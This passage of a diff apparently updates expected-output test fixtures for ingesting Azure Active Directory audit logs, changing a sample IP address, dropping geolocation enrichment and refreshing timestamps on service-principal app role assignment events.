Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125348500Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -18495,25 +16893,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -18527,7 +16907,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -18663,7 +17043,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -18675,12 +17055,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036564400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125354800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -18706,25 +17086,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -18738,7 +17100,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -18874,7 +17236,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -18886,12 +17248,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036568400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 